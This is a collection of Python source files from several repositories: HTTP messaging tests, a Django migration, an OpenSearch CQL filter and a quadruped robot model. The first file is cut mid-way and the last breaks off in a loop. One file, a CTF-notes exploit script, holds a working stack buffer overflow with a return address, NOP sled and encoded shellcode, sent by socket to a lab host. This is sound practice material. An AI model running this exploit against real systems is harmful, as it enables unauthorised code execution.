msg={'key': 'value'},
msg_type=MSG_ALGO)),
call('/test2', 'zero', None,
ComputationMessage(src_comp=None,
dest_comp=None,
msg={'key': 'value2'},
msg_type=MSG_ALGO)),
call('/test3', 'sender', 'dest',
ComputationMessage(src_comp=None,
dest_comp=None,
msg={'key': 'value3'},
msg_type=15)),
])
@pytest.fixture
def http_comms():
comm1 = HttpCommunicationLayer(('127.0.0.1', 10001))
comm1.discovery = Discovery('a1', ('127.0.0.1', 10001))
Messaging('a1', comm1)
comm2 = HttpCommunicationLayer(('127.0.0.1', 10002))
comm2.discovery = Discovery('a2', ('127.0.0.1', 10002))
Messaging('a2', comm2)
comm2.messaging.post_msg = MagicMock()
yield comm1, comm2
comm1.shutdown()
comm2.shutdown()
class TestHttpCommLayer(object):
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_one_message_between_two(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test'), MSG_ALGO))
comm2.messaging.post_msg.assert_called_with(
'c1', 'c2', Message('test','test'), MSG_ALGO)
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_several_messages_between_two(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c1', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c2', 'a1', ('127.0.0.1', 10001))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test1'), MSG_ALGO))
comm1.send_msg\
('a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test2'), MSG_ALGO))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('test','test3'), MSG_MGT))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('test', 'test4'), MSG_ALGO))
comm2.messaging.post_msg.assert_has_calls([
call('c1', 'c2', Message('test', 'test1'), MSG_ALGO),
call('c1', 'c2', Message('test', 'test2'), MSG_ALGO),
call('c1', 'c2', Message('test', 'test3'), MSG_MGT),
call('c1', 'c2', Message('test', 'test4'), MSG_ALGO),
])
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_computation_fail_mode(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
def raise_unknown(*args):
raise UnknownComputation('test')
comm2.messaging.post_msg = MagicMock(side_effect=raise_unknown)
with pytest.raises(UnknownComputation):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_computation_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
def raise_unknown(*args):
raise UnknownComputation('test')
comm2.messaging.post_msg = MagicMock(side_effect=raise_unknown)
# Default mode is ignore : always returns True
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 'test1'), MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_agent_fail_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, do NOT register a2, and still try to send a message to it
with pytest.raises(UnknownAgent):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_agent_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, do NOT register a2, and still try to send a message to it
# Default mode is ignore : always returns True
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('a1','t1'), MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unreachable_agent_fail_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, register a2 with the wrong port number
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10006))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
with pytest.raises(UnreachableAgent):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', '1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unreachable_agent_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, register a2 with the wrong port number
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10006))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't'), MSG_ALGO))
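
# Note (assumed invocation, based on skip_http_tests() above): the HTTP-based tests
# in this module can be skipped by exporting HTTP_TESTS=NO before running pytest, e.g.
#   HTTP_TESTS=NO pytest tests/unit/test_infra_communication.py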
avg_line_length: 37.395257 | max_line_length: 80 | alphanum_fraction: 0.63228 | count_classes: 15,846 | score_classes: 0.837438 | count_generators: 616 | score_generators: 0.032555 | count_decorators: 9,218 | score_decorators: 0.487158 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 4,092 | score_documentation: 0.216256

hexsha: af19bd3d785d56642d7b3f0a837d7edbf7bf7261 | size: 1,975 | ext: py | lang: Python
max_stars_repo_path: Stack-Based-BOF/THM-BOF-1/exploit.py | max_stars_repo_name: Rob-VanDusen/ctf-notes | max_stars_repo_head_hexsha: c88dc7597bca1bcda88d5ef07f38dcb50b89be59 | max_stars_repo_licenses: ["CC0-1.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: Stack-Based-BOF/THM-BOF-1/exploit.py | max_issues_repo_name: Rob-VanDusen/ctf-notes | max_issues_repo_head_hexsha: c88dc7597bca1bcda88d5ef07f38dcb50b89be59 | max_issues_repo_licenses: ["CC0-1.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Stack-Based-BOF/THM-BOF-1/exploit.py | max_forks_repo_name: Rob-VanDusen/ctf-notes | max_forks_repo_head_hexsha: c88dc7597bca1bcda88d5ef07f38dcb50b89be59 | max_forks_repo_licenses: ["CC0-1.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
#!/usr/bin/env python3
import socket
ip = "10.10.16.223"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62" # 625011AF
padding = "\x90" * 16
payload = ("\xbe\x13\xbf\x94\xb6\xdb\xd7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x70\x0e\x03\x63\xb1\x76\x43\x7f\x25\xf4"
"\xac\x7f\xb6\x99\x25\x9a\x87\x99\x52\xef\xb8\x29\x10\xbd\x34"
"\xc1\x74\x55\xce\xa7\x50\x5a\x67\x0d\x87\x55\x78\x3e\xfb\xf4"
"\xfa\x3d\x28\xd6\xc3\x8d\x3d\x17\x03\xf3\xcc\x45\xdc\x7f\x62"
"\x79\x69\x35\xbf\xf2\x21\xdb\xc7\xe7\xf2\xda\xe6\xb6\x89\x84"
"\x28\x39\x5d\xbd\x60\x21\x82\xf8\x3b\xda\x70\x76\xba\x0a\x49"
"\x77\x11\x73\x65\x8a\x6b\xb4\x42\x75\x1e\xcc\xb0\x08\x19\x0b"
"\xca\xd6\xac\x8f\x6c\x9c\x17\x6b\x8c\x71\xc1\xf8\x82\x3e\x85"
"\xa6\x86\xc1\x4a\xdd\xb3\x4a\x6d\x31\x32\x08\x4a\x95\x1e\xca"
"\xf3\x8c\xfa\xbd\x0c\xce\xa4\x62\xa9\x85\x49\x76\xc0\xc4\x05"
"\xbb\xe9\xf6\xd5\xd3\x7a\x85\xe7\x7c\xd1\x01\x44\xf4\xff\xd6"
"\xab\x2f\x47\x48\x52\xd0\xb8\x41\x91\x84\xe8\xf9\x30\xa5\x62"
"\xf9\xbd\x70\x24\xa9\x11\x2b\x85\x19\xd2\x9b\x6d\x73\xdd\xc4"
"\x8e\x7c\x37\x6d\x24\x87\xd0\x98\xbd\xaf\xf8\xf5\xbf\xaf\xe9"
"\x59\x49\x49\x63\x72\x1f\xc2\x1c\xeb\x3a\x98\xbd\xf4\x90\xe5"
"\xfe\x7f\x17\x1a\xb0\x77\x52\x08\x25\x78\x29\x72\xe0\x87\x87"
"\x1a\x6e\x15\x4c\xda\xf9\x06\xdb\x8d\xae\xf9\x12\x5b\x43\xa3"
"\x8c\x79\x9e\x35\xf6\x39\x45\x86\xf9\xc0\x08\xb2\xdd\xd2\xd4"
"\x3b\x5a\x86\x88\x6d\x34\x70\x6f\xc4\xf6\x2a\x39\xbb\x50\xba"
"\xbc\xf7\x62\xbc\xc0\xdd\x14\x20\x70\x88\x60\x5f\xbd\x5c\x65"
"\x18\xa3\xfc\x8a\xf3\x67\x1c\x69\xd1\x9d\xb5\x34\xb0\x1f\xd8"
"\xc6\x6f\x63\xe5\x44\x85\x1c\x12\x54\xec\x19\x5e\xd2\x1d\x50"
"\xcf\xb7\x21\xc7\xf0\x9d")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")
avg_line_length: 39.5 | max_line_length: 73 | alphanum_fraction: 0.696709 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,605 | score_documentation: 0.812658

hexsha: af1a49eb92cc6d5d66baa56866caa452bb8f70bb | size: 1,116 | ext: py | lang: Python
max_stars_repo_path: classification/migrations/0055_new_ekey_lrg_identifier.py | max_stars_repo_name: SACGF/variantgrid | max_stars_repo_head_hexsha: 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | max_stars_repo_licenses: ["RSA-MD"] | max_stars_count: 5 | max_stars_repo_stars_event_min_datetime: 2021-01-14T03:34:42.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-07T15:34:18.000Z
max_issues_repo_path: classification/migrations/0055_new_ekey_lrg_identifier.py | max_issues_repo_name: SACGF/variantgrid | max_issues_repo_head_hexsha: 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | max_issues_repo_licenses: ["RSA-MD"] | max_issues_count: 551 | max_issues_repo_issues_event_min_datetime: 2020-10-19T00:02:38.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-30T02:18:22.000Z
max_forks_repo_path: classification/migrations/0055_new_ekey_lrg_identifier.py | max_forks_repo_name: SACGF/variantgrid | max_forks_repo_head_hexsha: 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | max_forks_repo_licenses: ["RSA-MD"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
# Generated by Django 3.2.4 on 2021-09-08 04:50
from django.db import migrations
def _insert_lrg_id_key(apps, schema_editor):
    """ This can be deleted if there is a blat_keys migration after it """
    EvidenceKey = apps.get_model("classification", "EvidenceKey")
    EvidenceKey.objects.get_or_create(
        key="lrg_id",
        defaults={
            "evidence_category": "V",  # Variant section
            "order": 4,
            "value_type": "F",  # free text
            "copy_consensus": False,
            "max_share_level": "public",
            "label": "Locus Reference Genomic ID",
            "description": "Locus Reference Genomic (LRG) is a manually curated record that contains stable and thus, un-versioned reference sequences designed specifically for reporting sequence variants with clinical implications.",
            "see": "http://www.lrg-sequence.org/",
        }
    )


class Migration(migrations.Migration):
    dependencies = [
        ('classification', '0054_alter_uploadedfilelab_options'),
    ]

    operations = [
        migrations.RunPython(_insert_lrg_id_key)
    ]
avg_line_length: 33.818182 | max_line_length: 234 | alphanum_fraction: 0.646953 | count_classes: 207 | score_classes: 0.185484 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 608 | score_documentation: 0.544803

hexsha: af1cd328ee95b3ce28045b665a6e2190194f9a9c | size: 2,849 | ext: py | lang: Python
max_stars_repo_path: eoxserver/services/opensearch/extensions/cql.py | max_stars_repo_name: kalxas/eoxserver | max_stars_repo_head_hexsha: 8073447d926f3833923bde7b7061e8a1658dee06 | max_stars_repo_licenses: ["OML"] | max_stars_count: 25 | max_stars_repo_stars_event_min_datetime: 2015-08-10T19:34:34.000Z | max_stars_repo_stars_event_max_datetime: 2021-02-05T08:28:01.000Z
max_issues_repo_path: eoxserver/services/opensearch/extensions/cql.py | max_issues_repo_name: kalxas/eoxserver | max_issues_repo_head_hexsha: 8073447d926f3833923bde7b7061e8a1658dee06 | max_issues_repo_licenses: ["OML"] | max_issues_count: 153 | max_issues_repo_issues_event_min_datetime: 2015-01-20T08:35:49.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-16T11:00:56.000Z
max_forks_repo_path: eoxserver/services/opensearch/extensions/cql.py | max_forks_repo_name: kalxas/eoxserver | max_forks_repo_head_hexsha: 8073447d926f3833923bde7b7061e8a1658dee06 | max_forks_repo_licenses: ["OML"] | max_forks_count: 10 | max_forks_repo_forks_event_min_datetime: 2015-01-23T15:48:30.000Z | max_forks_repo_forks_event_max_datetime: 2021-01-21T15:41:18.000Z
content:
# ------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# ------------------------------------------------------------------------------
# Copyright (C) 2017 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ------------------------------------------------------------------------------
from eoxserver.core.decoders import kvp
from eoxserver.core.util.xmltools import NameSpace
from eoxserver.services import filters, ecql
class CQLExtension(object):
    """ Implementation of the OpenSearch `EO extension
    <http://docs.opengeospatial.org/is/13-026r8/13-026r8.html>`_.
    """
    namespace = NameSpace(
        "http://a9.com/-/opensearch/extensions/cql/1.0/", "cql"
    )

    def filter(self, qs, parameters):
        mapping, mapping_choices = filters.get_field_mapping_for_model(qs.model)
        decoder = CQLExtensionDecoder(parameters)
        cql_text = decoder.cql
        if cql_text:
            ast = ecql.parse(cql_text)
            filter_expressions = ecql.to_filter(ast, mapping, mapping_choices)
            qs = qs.filter(filter_expressions)
        return qs

    def get_schema(self, collection=None, model_class=None):
        return (
            dict(name="cql", type="cql", profiles=[
                dict(
                    href="http://www.opengis.net/csw/3.0/cql",
                    title=(
                        "CQL (Common Query Language) is a query language "
                        "created by the OGC for the Catalogue Web Services "
                        "specification."
                    )
                )
            ]),
        )


class CQLExtensionDecoder(kvp.Decoder):
    cql = kvp.Parameter(num="?", type=str)
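
# --- Illustrative sketch (not part of the original file) ----------------------
# How the extension is meant to be driven: the decoder pulls an optional ``cql``
# key/value parameter from the request, so a caller might do something like the
# hypothetical snippet below (queryset, parameter dict and CQL text are made up):
#
#   extension = CQLExtension()
#   params = {"cql": "cloudCover < 20"}      # hypothetical CQL text
#   qs = extension.filter(SomeEOModel.objects.all(), params)
#
# i.e. the CQL text is parsed into an AST with ecql.parse() and converted to
# Django ORM filters via ecql.to_filter() before being applied to the queryset.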
avg_line_length: 39.569444 | max_line_length: 80 | alphanum_fraction: 0.614953 | count_classes: 1,249 | score_classes: 0.438399 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,777 | score_documentation: 0.623728

hexsha: af1d6a6d06805cdde1b38ccbd57154e51315542b | size: 31,786 | ext: py | lang: Python
max_stars_repo_path: examples/quadruped3D.py | max_stars_repo_name: alknemeyer/physical_education | max_stars_repo_head_hexsha: 7bcad4111bc153a0c9c080f11a43295bd1d8c425 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 5 | max_stars_repo_stars_event_min_datetime: 2020-09-27T14:00:12.000Z | max_stars_repo_stars_event_max_datetime: 2022-01-31T09:06:37.000Z
max_issues_repo_path: examples/quadruped3D.py | max_issues_repo_name: alknemeyer/physical_education | max_issues_repo_head_hexsha: 7bcad4111bc153a0c9c080f11a43295bd1d8c425 | max_issues_repo_licenses: ["MIT"] | max_issues_count: 8 | max_issues_repo_issues_event_min_datetime: 2020-09-27T15:02:28.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-28T13:51:38.000Z
max_forks_repo_path: examples/quadruped3D.py | max_forks_repo_name: alknemeyer/physical_education | max_forks_repo_head_hexsha: 7bcad4111bc153a0c9c080f11a43295bd1d8c425 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 2 | max_forks_repo_forks_event_min_datetime: 2020-09-27T14:01:39.000Z | max_forks_repo_forks_event_max_datetime: 2022-01-21T09:47:54.000Z
content:
from typing import Any, Dict, Iterable, List, Optional, Tuple, Callable
from math import pi as π
from sympy import Matrix as Mat
from numpy import ndarray
from physical_education.links import Link3D, constrain_rel_angle
from physical_education.system import System3D
from physical_education.foot import add_foot, feet, Foot3D
from physical_education.motor import add_torque
from physical_education.drag import add_drag
from physical_education.spring import add_torquespring
from physical_education.damper import add_torquedamper
parameters = {
# # The model below is terribly out of date. If needed, manually
# # uncomment + test it!
# 'model-6': {
# 'source': """
# A model of cheetah 6 from Functional anatomy of the cheetah (Acinonyx jubatus) forelimb and hindlimb
# doi: 10.1111/j.1469-7580.2011.01344.x and 10.1111/j.1469-7580.2010.01310.x
# """,
# 'body_B': {'mass': 17., 'radius': 0.08, 'length': 0.41},
# 'body_F': {'mass': 8., 'radius': 0.08, 'length': 0.21},
# 'tail0': {'mass': 0.4, 'radius': 0.005, 'length': 0.38},
# 'tail1': {'mass': 0.2, 'radius': 0.005, 'length': 0.38},
# 'front': {
# 'thigh': {'mass': 0.171, 'radius': 0.012, 'length': 0.254},
# 'calf': {'mass': 0.068, 'radius': 0.005, 'length': 0.247},
# },
# 'back': {
# 'thigh': {'mass': 0.210, 'radius': 0.010, 'length': 0.281},
# 'calf': {'mass': 0.160, 'radius': 0.011, 'length': 0.287},
# },
# 'friction_coeff': 1.3,
# 'motor_params': {'torque_bounds': (-2., 2.), 'no_load_speed': 50.},
# },
'mean-male': {
'source': """
Parameters for the 'mean' (X) cheetah from
Morphology, Physical Condition, and Growth of the Cheetah (Acinonyx jubatus jubatus)
https://academic.oup.com/jmammal/article/84/3/840/905900
body mass = 45.6 kg ---> majority (42kg?) in body
chest girth = 71.7 cm ---> front radius = 0.717m / (2*pi)
abdomen girth = 59.4 cm ---> back radius = 0.594m / (2*pi)
skull length = 23.4 cm
body length = 125.5 cm ---> body - skull - neck = 125.5 - 23.4 - (20?) = 80cm => front = 0.5m, back = 0.3m
tail length = 76.7 cm ---> 38cm per half
total length = 202.2 cm
total foreleg length = 77 cm
total hind leg length = 81.1 cm
front foot length = 8.2 cm
front foot width = 6.1 cm
hind foot length = 9.2 cm
hind foot width = 6.2 cm
From "Quasi-steady state aerodynamics of the cheetah tail"
fur length on tail = 10mm on average
average tail diameter (no fur) = 31mm
---> radius = 31/2 + 10 = 25.5mm = 0.0255m
Friction coeff of 1.3 from
"Locomotion dynamics of hunting in wild cheetahs"
NOTE: leg measurements mostly cribbed from 'model-6' above. Find proper values!
lengths = same
masses = same * 1.2
radii = same
NOTE: the motor_params values are mostly made up. In any case, different muscle
groups would need different values
""",
'body_B': {'mass': 28., 'radius': 0.594/(2*π), 'length': 0.3},
'body_F': {'mass': 14., 'radius': 0.717/(2*π), 'length': 0.5},
'tail0': {'mass': 0.4, 'radius': 0.0255, 'length': 0.38},
'tail1': {'mass': 0.2, 'radius': 0.0255, 'length': 0.38},
'front': {
'thigh': {'mass': 0.171*1.2, 'radius': 0.012, 'length': 0.254},
'calf': {'mass': 0.068*1.2, 'radius': 0.005, 'length': 0.247},
},
'back': {
'thigh': {'mass': 0.210*1.2, 'radius': 0.010, 'length': 0.281},
# based on ratios
'calf': {'mass': 0.100*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(33/(33+24.5))},
# from Liams model
'hock': {'mass': 0.060*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(24.5/(33+24.5))},
},
'friction_coeff': 1.3,
# measured in terms of body weight, based on the observed limits
# of energy efficient gallops and C-turns at 8, 14 and 20 m/s
# for this model
'motor': {
'spine': {'torque_bounds': (-0.7, 0.7), 'no_load_speed': 50.},
'spine-tail0': {'torque_bounds': (-0.25, 0.25), 'no_load_speed': 50.},
'tail0-tail1': {'torque_bounds': (-0.2, 0.2), 'no_load_speed': 50.},
'front': {
'hip-pitch': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.5, 0.4), 'no_load_speed': 50.},
},
'back': {
'hip-pitch': {'torque_bounds': (-0.6, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.4, 0.5), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.1, 0.5), 'no_load_speed': 50.},
'ankle': {'torque_bounds': (-0.4, 0.05), 'no_load_speed': 50.},
},
},
},
}
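
# Worked example of the girth-to-radius conversion used above: a chest girth of
# 0.717 m gives a front-body radius of 0.717 / (2*π) ≈ 0.114 m, and an abdomen
# girth of 0.594 m gives a back-body radius of 0.594 / (2*π) ≈ 0.095 m.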
def model(params: Dict[str, Any], with_tail: bool) -> Tuple[System3D, Callable[[System3D], None]]:
"""
Defines a quadruped model based off a cheetah (see `cheetah-model.png`).
Roughly 400 000 operations in the equations of motion without simplification,
and 140 000 if simplified with
>>> robot.calc_eom(simp_func = lambda x: utils.parsimp(x, nprocs = 14))
Note that the numbers are probably out of date at this point.
"""
# create front and back links of body and tail
body_B = Link3D('base_B', '+x', base=True, **params['body_B'],
meta=['spine', 'back'])
body_F = Link3D('base_F', '+x', start_I=body_B.bottom_I, **params['body_F'],
meta=['spine', 'front'])
# input torques for roll, pitch and yaw of the spine
# body_B.add_hookes_joint(body_F, about='xyz')
add_torque(body_B, body_F, about='xyz', **params['motor']['spine'])
# spring/damper forces on spine
phi_b, th_b, psi_b = body_B.q[3:]
phi_f, th_f, psi_f = body_F.q[:3]
for angles, dof in [(phi_b - phi_f, 'roll'),
(th_b - th_f, 'pitch'),
(psi_b - psi_f, 'yaw')]:
# TODO: actually find these by initialising to 0.5 and bounding to (0.1, 10.)
# the current fixed values are sort of arbitrary (based on a paper)
# about humans
add_torquespring(body_B, body_F, angles, spring_coeff=0.5,
# spring_coeff_lims=(0.1, 10.),
rest_angle=0,
name=f'spine-torquespring-{dof}')
add_torquedamper(body_B, body_F, angles, damping_coeff=0.5,
# damping_coeff_lims=(0.1, 10.),
name=f'spine-torquedamper-{dof}')
# drag on body
add_drag(body_F, at=body_F.bottom_I, name='body_F-drag-head',
use_dummy_vars=True, cylinder_top=True)
add_drag(body_F, at=body_F.Pb_I, name='body_F-drag-body',
use_dummy_vars=True)
add_drag(body_B, at=body_B.Pb_I, use_dummy_vars=True)
if with_tail:
tail0 = Link3D('tail0', '-x', start_I=body_B.top_I,
**params['tail0'], meta=['tail'])
tail1 = Link3D('tail1', '-x', start_I=tail0.bottom_I,
**params['tail1'], meta=['tail'])
# friction coefficient of 0.1 is arbitrary. Worth setting to 0
# in case it speeds things up?
add_foot(tail1, at='bottom', nsides=8, friction_coeff=0.1,
GRFxy_max=0.1, GRFz_max=0.1)
# input torques to tail - pitch and yaw
body_B.add_hookes_joint(tail0, about='xy')
add_torque(body_B, tail0, about='xy', **params['motor']['spine-tail0'])
# torques in the middle of the tail - pitch and yaw
tail0.add_hookes_joint(tail1, about='xy')
add_torque(tail0, tail1, about='xy', **params['motor']['tail0-tail1'])
# drag on tail
add_drag(tail0, at=tail0.Pb_I, use_dummy_vars=True)
add_drag(tail1, at=tail1.Pb_I, use_dummy_vars=True)
def def_leg(body: Link3D, front: bool, right: bool) -> Iterable[Link3D]:
"""Define a leg and attach it to the front/back right/left of `body`.
Only really makes sense when `body` is aligned along the `x`-axis"""
# maybe flip x (or y)
# the model is considered to face along the x axis (so front/back
# refers to changes in the y value).
def mfx(x): return x if front else -x
def mfy(y): return y if right else -y
start_I = body.Pb_I + \
body.Rb_I @ Mat([mfx(body.length/2), mfy(body.radius), 0])
suffix = ('F' if front else 'B') + ('R' if right else 'L')
frontorback_str = 'front' if front else 'back'
rightorleft_str = 'right' if right else 'left'
p = params[frontorback_str]
thigh = Link3D('U'+suffix, '-z', start_I=start_I, **p['thigh'],
meta=['leg', 'thigh', frontorback_str, rightorleft_str])
calf = Link3D('L'+suffix, '-z', start_I=thigh.bottom_I, **p['calf'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
# next, all of the muscles and their respective limits
muscleparams = params['motor'][frontorback_str]
# input torques: hip pitch and abduct
body.add_hookes_joint(thigh, about='xy')
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-pitch',
about='x', **muscleparams['hip-pitch'])
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-abduct',
about='y', **muscleparams['hip-abduct'])
thigh.add_revolute_joint(calf, about='y')
add_torque(thigh, calf, about='y', **muscleparams['knee'])
if front:
add_foot(calf, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf
else:
hock = Link3D('H'+suffix, '-z', start_I=calf.bottom_I, **p['hock'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
calf.add_revolute_joint(hock, about='y')
add_torque(calf, hock, about='y', **muscleparams['ankle'])
add_foot(hock, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf, hock
ufl, lfl = def_leg(body_F, front=True, right=False)
ufr, lfr = def_leg(body_F, front=True, right=True)
ubl, lbl, hbl = def_leg(body_B, front=False, right=False)
ubr, lbr, hbr = def_leg(body_B, front=False, right=True)
# combine into a robot
tail = [tail0, tail1] if with_tail else [] # type: ignore
robot = System3D('3D quadruped', [body_B, body_F, *tail,
ufl, lfl, ufr, lfr,
ubl, lbl, ubr, lbr,
hbl, hbr])
return robot, add_pyomo_constraints
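
# --- Illustrative sketch (not part of the original file) ----------------------
# Rough intended usage of model(), inferred from its signature and docstring
# (the simplification call is quoted from the docstring above; everything else is
# an assumption about the physical_education API, not taken from this file):
#
#   robot, add_constraints = model(parameters['mean-male'], with_tail=True)
#   robot.calc_eom(simp_func=lambda x: utils.parsimp(x, nprocs=14))
#   # ... once a Pyomo model exists on the robot (robot.m), apply the joint limits:
#   add_constraints(robot)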
def has_tail(robot: System3D) -> bool:
return any('tail' in link.name for link in robot.links)
def add_pyomo_constraints(robot: System3D) -> None:
# π/3 = 60 degrees
# π/2 = 90 degrees
# π/4 = 45 degrees
assert robot.m is not None,\
'robot does not have a pyomo model defined on it'
if has_tail(robot):
body_B, body_F, tail0, tail1, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
else:
body_B, body_F, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
tail0 = tail1 = None
# spine can't bend too much:
constrain_rel_angle(robot.m, 'spine_pitch',
-π/4, body_B[:, :, 'theta'], body_F[:, :, 'theta'], π/4)
constrain_rel_angle(robot.m, 'spine_roll',
-π/4, body_B[:, :, 'phi'], body_F[:, :, 'phi'], π/4)
constrain_rel_angle(robot.m, 'spine_yaw',
-π/4, body_B[:, :, 'psi'], body_F[:, :, 'psi'], π/4)
# tail can't go too crazy:
if tail0 is not None:
constrain_rel_angle(robot.m, 'tail_body_pitch',
-π/3, body_B[:, :, 'theta'], tail0[:, :, 'theta'], π/3)
constrain_rel_angle(robot.m, 'tail_body_yaw',
-π/3, body_B[:, :, 'phi'], tail0[:, :, 'phi'], π/3)
constrain_rel_angle(robot.m, 'tail_tail_pitch',
-π/2, tail0[:, :, 'theta'], tail1[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, 'tail_tail_yaw',
-π/2, tail0[:, :, 'phi'], tail1[:, :, 'phi'], π/2)
# legs: hip abduction and knee
for body, thigh, calf, hock, name in ((body_F, ufl, lfl, None, 'FL'),
(body_F, ufr, lfr, None, 'FR'),
